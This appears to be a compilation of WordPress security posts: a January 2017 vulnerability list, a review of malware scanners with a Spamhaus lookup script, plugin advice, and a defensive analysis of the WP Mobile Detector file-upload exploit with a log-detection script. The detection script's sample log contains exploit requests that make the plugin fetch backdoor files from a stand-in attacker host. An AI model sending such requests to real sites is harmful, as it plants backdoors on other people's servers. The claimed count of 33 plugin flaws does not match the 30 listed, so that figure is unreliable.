WordPress Vulnerabilities: Core, Plugins & Themes Vulnerabilities Roundup for January 2017


In January 33 WordPress plugin vulnerabilities were reported, and 12 in WordPress core. Since we started keeping a record of reported vulnerabilities, this has been the busiest month for WordPress core vulnerabilities. That is not a bad sign: a steady stream of reported and fixed vulnerabilities shows that WordPress is being scrutinised and is becoming more secure software, as explained in Crunching the numbers: how secure is WordPress?

Below is the complete list of the WordPress plugin, theme and core vulnerabilities reported in January 2017:

WordPress Vulnerabilities in Plugins

  • CSRF and XSS vulnerabilities in ABASE plugin
  • Arbitrary file upload vulnerability in Seo Spy plugin
  • Arbitrary file upload vulnerability in PHP Analytics plugin
  • Arbitrary file upload vulnerability in Social plugin
  • Remote Code Execution (RCE) in Google Maps by Daniel Martyn plugin
  • Arbitrary file upload vulnerability in ChikunCounter plugin
  • Arbitrary File Upload Vulnerability in Developer Tools plugin
  • Unauthenticated PHP Object injection in CMS Commander Client plugin
  • Unauthenticated PHP Object injection in Google Forms plugin
  • Arbitrary File Upload vulnerability in DOP Slider plugin
  • CSRF and XSS vulnerabilities in Hupso Share Buttons for Twitter, Facebook & Google+ plugin
  • Open redirect vulnerability in moreAds SE
  • Reflected Cross-Site Scripting (XSS) Vulnerability in moreAds SE plugin
  • Information Disclosure Vulnerability in W3 Total Cache plugin
  • CSRF and XSS in Arigato Autoresponder and Newsletter plugin
  • Reflected Cross-Site Scripting (XSS) vulnerability in Event Notifier plugin
  • Remote Local File Inclusion in Direct Download for WooCommerce
  • Reflected Cross-Site Scripting (XSS) Vulnerability in WangGuard plugin
  • SQL Injection in 404 Redirection Manager
  • Reflected Cross-Site Scripting (XSS) Vulnerability in Super Socializer
  • Cross-Site Scripting (XSS) & CSRF in Responsive Poll plugin
  • Privilege Escalation in WP Support Plus Responsive Ticket System plugin
  • PHP Object Injection Vulnerability in Post Grid plugin
  • Username enumeration bypasses in Stop User Enumeration plugin
  • Cross-Site Scripting (XSS) in Chained Quiz plugin
  • Cross-site Scripting vulnerability in WooCommerce plugin
  • Authenticated Arbitrary File Deletion in Slider plugin
  • Authenticated Path Traversal in XCloner – Backup and Restore plugin
  • Authenticated Arbitrary File Deletion Vulnerability in BuddyPress
  • Information disclosure in Pike Firewall WordPress plugin

WordPress Vulnerabilities in Core

  • Unauthenticated privilege escalation in a REST API endpoint
  • Cross-Site Scripting (XSS) in posts list table
  • SQL Injection in WP_Query
  • Press This available to unauthorised users
  • Cross-site request forgery (CSRF) in WordPress prior to 4.7.1
  • Information Disclosure in WordPress prior to 4.7.1
  • Cross-site request forgery (CSRF) in the accessibility mode of widget editing
  • Cross-site scripting (XSS) vulnerability via theme name fallback
  • Cross-site request forgery (CSRF) bypass via uploading a Flash file.
  • Cross-site scripting in update-core.php
  • User information disclosure in WordPress Rest API
  • Remote code execution vulnerability in PHPMailer (shipped with WordPress)

You can read the release notes of WordPress 4.7.1 and 4.7.2 for more information on the core vulnerabilities listed above that are not linked: the REST API privilege escalation, the posts list table XSS, the WP_Query SQL injection and the Press This issue were fixed in 4.7.2 (released 26 January 2017), the rest in 4.7.1. If you run a site on 4.7.0 or 4.7.1, the REST API issue alone is reason enough to update immediately.


Source: WPWhiteSecurity


Top 5 Useful Tools to Scan Websites for Virus and Malware Infection

Aside from periodically scanning our PCs for viruses, there is also a need to scan websites for virus or malware infection. A malware infection on a website can have serious consequences for the performance of the website, for the hosting server and for the site owner (blacklisting, loss of visitors, and the cost of clean-up).

There are several websites offering useful tools online for webmasters to scan websites. These scans provide useful information and helpful security tips.

Some of these providers also have WordPress plugins to scan WordPress-powered websites. These plugins look for malware, trojans, backdoors, worms, viruses, web shells, spyware and other threats, as well as for obfuscated JavaScript, exploit code, malicious iframes, injected code, auto-generated malicious content, redirects, hidden eval() calls and more.

Here are some of the top tools to scan websites

Sucuri Online Scan

Sucuri is a well-known provider of website security services with a specialisation in WordPress. Its free online scanner doubles as a lead generator for the paid services, but it does tell you whether your website shows signs of injected spam, defacement or malware. Sucuri also has a WordPress plugin that is easy to install and configure. It is a security suite meant to complement your existing security posture with seven key features:

  1. Security Activity Audit Logging
  2. File Integrity Monitoring
  3. Remote Malware Scanning
  4. Blacklist Monitoring
  5. Effective Security Hardening
  6. Post-Hack Security Actions
  7. Security Notifications

VirusTotal

VirusTotal is a simple tool for scanning websites and it does a good job of it. It lets you submit a file or a URL and reports what the participating antivirus engines and URL scanners found: viruses, worms, Trojans and other malware on your website. Using VirusTotal is free. Keep in mind that a clean result only means that none of the engines recognised the sample; it is not proof that the site is clean. VirusTotal is a subsidiary of Google. Despite its simple design, there is an active community behind the tool waiting for you to join.

SpamHaus

SpamHaus is a great security help for any type of website. It has two distinct tools: IP Address Lookup and Domain Lookup. The first tells you whether an IP address is associated with spam or other abuse by checking it against the Spamhaus Block List (SBL) and its companion lists (XBL for exploited hosts and open proxies, PBL for end-user address space). The SBL is used both as a sender IP blocklist and as a URI blocklist, and it is very effective as a URI blocklist. For example, if you notice an IP address repeatedly attempting to log in to your website, look it up to find out whether it is already known for abuse.

The second tool, Domain Lookup, tells you whether your domain is on their list of spam sources (the Domain Block List, DBL). I hope you never end up on this list, but if you do, SpamHaus provides information on how to resolve the underlying security issue and then request removal from the list.
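The IP lookup described above can also be done over DNS, which is how mail servers and firewalls consume the same data and which lets you check every address that hammers wp-login.php without pasting each one into a web form. The following is an added example, not a Spamhaus tool: it reverses the IPv4 octets, appends the zen.spamhaus.org zone (which combines SBL, XBL and PBL), and interprets the 127.0.0.x answer by its last octet using the return codes Spamhaus publishes for ZEN. The sample addresses are constructed. Free use is limited to low-volume, non-commercial queries from your own resolver; queries sent through a public resolver such as 8.8.8.8 get an error code instead of a verdict, which the code reports rather than misreading as a listing.

```python
"""Added example (not a Spamhaus tool): DNS-based check of an IPv4 address against
zen.spamhaus.org. Return-code table as published by Spamhaus for ZEN; samples constructed."""
import ipaddress
import socket

ZEN_ZONE = "zen.spamhaus.org"

# Last octet of a 127.0.0.x answer -> which Spamhaus list matched.
RETURN_CODES = {
    2: "SBL - known spam source",
    3: "SBL CSS - snowshoe or compromised sender",
    4: "XBL - exploited host, open proxy or botnet member",
    5: "XBL - exploited host, open proxy or botnet member",
    6: "XBL - exploited host, open proxy or botnet member",
    7: "XBL - exploited host, open proxy or botnet member",
    10: "PBL - end-user address space (ISP policy)",
    11: "PBL - end-user address space (Spamhaus policy)",
}

# 127.255.255.x answers are error signals from the DNSBL, not listings.
ERROR_CODES = {
    252: "query name typo",
    254: "query sent via a public/open resolver; use your own resolver",
    255: "query volume exceeded the free-use limit",
}


def dnsbl_query_name(ip, zone=ZEN_ZONE):
    """Build the DNSBL name for an IPv4 address: 192.0.2.1 -> 1.2.0.192.zen.spamhaus.org"""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("only IPv4 is handled here; ZEN is an IPv4 zone")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def interpret(answer):
    """Map a DNSBL answer address to (listed, description).

    listed is True for a real listing and None for an error response."""
    octets = [int(o) for o in answer.split(".")]
    if octets[:3] == [127, 255, 255]:
        return (None, "DNSBL error: " + ERROR_CODES.get(octets[3], "code %d" % octets[3]))
    if octets[0] == 127:
        return (True, RETURN_CODES.get(octets[3], "listed, undocumented code %d" % octets[3]))
    return (None, "unexpected answer " + answer)


def lookup(ip):
    """Query ZEN for an IPv4 address (needs network); returns a list of (listed, description)."""
    name = dnsbl_query_name(ip)
    try:
        answers = socket.gethostbyname_ex(name)[2]
    except socket.gaierror as exc:
        if exc.errno == socket.EAI_NONAME:   # NXDOMAIN: not on any ZEN list
            return [(False, "not listed")]
        return [(None, "resolver failure: %s" % exc)]
    return [interpret(a) for a in answers]


if __name__ == "__main__":
    # Constructed example: an address seen repeatedly failing logins in your access log.
    for verdict in lookup("192.0.2.1"):
        print(verdict)
```

Only `lookup()` touches the network; `dnsbl_query_name()` and `interpret()` are pure, so the conventions can be checked offline. A listing on the PBL alone means the address is in dynamic end-user space, which is normal for a human visitor and only suspicious for a host that should be a server.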

Quttera

Quttera is another impressive free tool that should be used periodically to scan websites. It is a cloud-based application that scans a website and generates a scan report. It checks URIs for suspicious scripts, malicious files and other threats hidden in otherwise legitimate content. Because it analyses many files, a scan takes a few minutes before the results are listed, and because many sites are scanned simultaneously you may be told to try again later. That is annoying, but the service is free and of good quality, so a little patience is worth it.

The Quttera Web Malware Scanner plugin provided in the WordPress plugin repository scans your WordPress website for known and unknown malware and other suspicious activities.

Acunetix

Unlike the previous tools, this one requires a subscription, but it is similar in terms of efficiency and usefulness. Acunetix is a well-established vulnerability scanner vendor and its online scan provides a lot of valuable information. It detects and reports a wide array of vulnerabilities in applications built on WordPress, PHP, ASP.NET, Java frameworks, Ruby on Rails and many others. Acunetix Vulnerability Scanner can be used to scan for vulnerable WordPress plugins and to run other WordPress-specific configuration tests, such as checking for weak WordPress admin passwords, username enumeration and WordPress configuration file disclosure. The Acunetix WordPress plugin identifies malicious plugins, themes and URLs within website pages.

Do you use other tools not mentioned here? Let me know so I can check them out too.

List of Important WordPress Plugins you must install on your website

Whether you have an existing WordPress site or are just building one, here is a list of the most important WordPress plugins you should have installed on your website.

WordPress is designed to be lean and lightweight, with a lot of features and flexibility, but there is still plenty of functionality missing from it. Plugins are designed to fill in these gaps. They offer custom functions and features so that users can tailor their sites to their specific needs.


Plugins are used to extend and add to the functionality that already exists in WordPress


The best way to fill in the missing pieces is to get yourself the right plugins. It is often confusing trying to pick out the plugins to install among the many that are available. I will admit that it can be difficult sometimes to sort out the good from the, well, not so good. But I have tried to simplify the process of choosing the most important WordPress plugins you should use. I have also provided links to these important WordPress plugins where necessary.

WordPress Plugins are available from several sources. The most popular and official source for WordPress Plugins is the WordPress Plugin Directory.

So here is a collection of free and premium WordPress plugins you should have installed on your website, with options for everything from caching and SEO to security and backup. Whatever you pick, keep the number of plugins small and keep them updated: every plugin is extra attack surface, as the monthly vulnerability roundups above show.

The Most Important WordPress Plugins are for:

Security

This is the first set of plugins I recommend installing right after installing WordPress for your website. Every webmaster or site owner should install one or two of these plugins to secure their website. Some of these plugins are Wordfence Security, WPS Hide Login, Sucuri Security and iThemes Security (formerly Better WP Security). Installing any of them will further protect your WordPress website against malware, brute-force attacks and login abuse, but they complement rather than replace keeping WordPress core, plugins and themes up to date. I have these plugins installed on my various websites.

SEO

As the name implies, these plugins add SEO functionality to a website. Aside from security, this is another important category of WordPress plugin that should not be missing from your site. The plugins I recommend are Yoast SEO and All in One SEO Pack. They help you write better content, choose a focus keyword for each article and make sure the focus keyword is used consistently throughout the article.

Anti-Spam

Spam comments are unsolicited comments posted on websites by spambots or spammers, and most of them are advertisements. Anti-spam plugins check each comment to see whether it looks like spam and let you review the comments they blocked. Without an anti-spam plugin you stand little chance against comment spam. The most popular anti-spam plugin for WordPress is Akismet, and it does a good job of catching spam comments.

Analytics

Tracking the number of visitors to your website need not be a hard task. These plugins let you track your site easily, and installing one is important so that you can measure the growth of your website. An example is Google Analytics Dashboard for WP. This plugin tracks your site using the latest Google Analytics tracking code and lets you view the key Google Analytics reports on your WordPress dashboard.

Caching

Caching is the fastest way to improve WordPress performance and reduce page load times. WordPress cache plugins store posts and pages as static files which are then served to visitors instead of being rebuilt by PHP and MySQL on every request, which can improve response times dramatically. Popular caching plugins are W3 Total Cache and WP Super Cache.

Social Sharing

Very useful if you want your visitors to share your content, such as blog posts and pages, via social media and email. Social sharing is a powerful way to increase site traffic and boost social engagement with your website. Check out some of the available social sharing plugins here.

Related Posts

These plugins display a list of related posts after the original post, i.e. posts in the same category as the one being read. Showing links to related content helps your readers keep reading on your site, which increases the time visitors spend there and your chance of engaging with them. This function is already built into some premium themes, but if yours does not have it, a related posts plugin is the way to go; you can download one from the numerous plugins here.

Email Subscription

These plugins place a form on your site that lets visitors subscribe to future posts or newsletters from your blog. This is a great way to build an email marketing list and an essential tool for engaging visitors on any website. Install one early so that you can start capturing the email addresses of your visitors from the beginning. You can then grow your subscriber list, engage visitors, convert them and decrease your bounce rate. Check out some here.


Do you have a favorite plugin from this list? Is there any WordPress plugin that you think is absolutely essential for every WordPress site? Indicate in the comments below.

WP Mobile Detector Plugin Vulnerability is being Exploited


WP Mobile Detector is a plugin that automatically detects whether a visitor is using a standard mobile phone or a smartphone and loads a compatible WordPress mobile theme for each.

Over the last few days Sucuri noticed an increasing number of infected websites that had no outdated plugin or known vulnerability; in most cases it was a porn spam infection. When the research team dug into the issue, the common denominator across these WordPress sites was the WP Mobile Detector plugin, which had a 0-day arbitrary file upload vulnerability disclosed on May 31st by the Plugin Vulnerabilities team. The plugin has since been removed from the WordPress repository and no patch is available.

The vulnerability is very easy to exploit: all the attacker needs to do is send a request to resize.php, or to timthumb.php (yes, timthumb; in this case it simply includes resize.php), inside the plugin directory, with the src parameter pointing at the URL of a backdoor. The vulnerability was publicly disclosed on May 31st, but according to Sucuri's firewall logs the attacks had been going on since May 27th.

It is a simple vulnerability that stems from failing to validate and sanitise input from an untrusted source. No security checks are performed, so an attacker can feed the src variable a URL that serves PHP code; the script fetches that file and stores it in the plugin's cache directory, where it can then be requested directly and executed by the web server.

It is highly recommended that everyone removes this plugin for now. If you really need it, a partial temporary fix is to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example with this .htaccess file placed in that subdirectory (on Apache 2.4 without mod_access_compat, use Require all denied instead of deny from all; nginx does not read .htaccess at all, so the equivalent location block must go in the server configuration):

<Files *.php>
deny from all
</Files>

Please note that this fix only stops the uploaded files from being executed on your server. Attackers will still be able to upload files to the cache subdirectory and link to them in attacks on third-party sites (iframes, scripts, malicious downloads) or simply use your site to host spammy or illegal content. You can also revoke write permissions on the cache subdirectory altogether, but that may break the plugin's functionality.

Sucuri tested this exploit against the most popular WordPress security plugins offering application-level firewalls and other preventive measures, and it evaded all of them. Sites behind the Sucuri Firewall have been virtually patched at the edge by its virtual hardening engine since the disclosure.

At the moment the majority of the vulnerable sites are infected with porn spam doorways. You can usually find a gopni3g directory in the site root containing story.php (the doorway generator script), an .htaccess file and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.
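As an added example (not Sucuri's code and nothing from the plugin), here is a small Python script that checks for the two kinds of evidence described above: exploit attempts in the web-server access log, where resize.php or timthumb.php under the plugin directory is requested with a remote src URL, and the on-disk artefacts, namely PHP files written into wp-mobile-detector/cache and the gopni3g/story.php doorway generator. The Apache combined log format, the plugin path, and the sample log lines and files are assumptions constructed for the demo; the legitimate request in the sample passes a local image path, which is the behaviour the remote-src check distinguishes from an attack.

```python
"""Added example: log- and filesystem-based detection of the WP Mobile Detector
arbitrary file upload campaign. Paths, log format and all samples are assumptions."""
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

PLUGIN_PATH = "/wp-content/plugins/wp-mobile-detector/"
ENTRY_SCRIPTS = ("resize.php", "timthumb.php")   # timthumb.php just includes resize.php
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")

# Apache combined log: client - user [time] "METHOD target PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_request(line):
    """Return (client_ip, timestamp, src) for a request matching the exploit pattern,
    else None. Pattern: an entry script in the plugin directory called with a `src`
    that is a remote http(s) URL. Legitimate use passes a local image path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, _method, target, _status = m.groups()
    url = urlsplit(target)
    if not url.path.startswith(PLUGIN_PATH) or os.path.basename(url.path) not in ENTRY_SCRIPTS:
        return None
    src = parse_qs(url.query).get("src", [""])[0]
    src_url = urlsplit(src)
    if src_url.scheme in ("http", "https") and src_url.netloc:
        return (client, ts, src)
    return None


def scan_log(lines):
    """Run suspicious_request over an iterable of log lines and keep the hits."""
    return [hit for hit in map(suspicious_request, lines) if hit]


def scan_site(docroot):
    """Return docroot-relative paths of on-disk indicators: executable files in the
    plugin's cache directory, and the gopni3g/story.php doorway generator."""
    findings = []
    cache_dir = os.path.join(docroot, "wp-content", "plugins", "wp-mobile-detector", "cache")
    if os.path.isdir(cache_dir):
        for name in os.listdir(cache_dir):
            if name.lower().endswith(SCRIPT_EXTS):
                findings.append(os.path.relpath(os.path.join(cache_dir, name), docroot))
    doorway = os.path.join(docroot, "gopni3g", "story.php")
    if os.path.isfile(doorway):
        findings.append(os.path.relpath(doorway, docroot))
    return sorted(findings)


# Constructed sample log: one legitimate resize, two exploit attempts, one unrelated hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2016:10:01:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/logo.png&w=320 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/May/2016:10:02:15 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://attacker.example/backdoor.php HTTP/1.1" 200 84 "-" "curl/7.47.0"',
    '198.51.100.23 - - [27/May/2016:10:02:16 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://attacker.example/shell.php HTTP/1.1" 200 84 "-" "curl/7.47.0"',
    '192.0.2.9 - - [27/May/2016:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def build_sample_site():
    """Constructed docroot carrying both on-disk indicators (file contents are placeholders)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-content", "plugins", "wp-mobile-detector", "cache"))
    os.makedirs(os.path.join(root, "gopni3g"))
    for rel in ("wp-content/plugins/wp-mobile-detector/cache/shell.php",
                "wp-content/plugins/wp-mobile-detector/cache/thumb.jpg",
                "gopni3g/story.php"):
        with open(os.path.join(root, *rel.split("/")), "w") as fh:
            fh.write("placeholder\n")
    return root


if __name__ == "__main__":
    for client, ts, src in scan_log(SAMPLE_LOG):
        print("exploit attempt from %s at %s fetching %s" % (client, ts, src))
    for path in scan_site(build_sample_site()):
        print("indicator on disk: %s" % path)
```

Run the log check over the whole retention window, not just the last few days: the page notes that attacks began before the public disclosure, so the first hit tells you when to start looking for dropped files. The cache-directory check deliberately looks at file extensions only; a second pass with the scanners above, or a grep for eval/base64_decode in anything recently modified, catches payloads disguised as images.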